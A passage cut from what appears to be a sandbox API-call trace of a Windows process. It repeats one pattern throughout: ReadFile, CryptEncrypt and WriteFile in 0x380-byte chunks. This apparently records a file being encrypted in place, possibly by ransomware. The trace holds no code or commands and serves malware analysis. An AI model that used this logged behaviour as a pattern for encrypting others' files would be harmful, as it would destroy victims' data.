hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.675] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.676] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.678] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.679] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.680] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.681] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 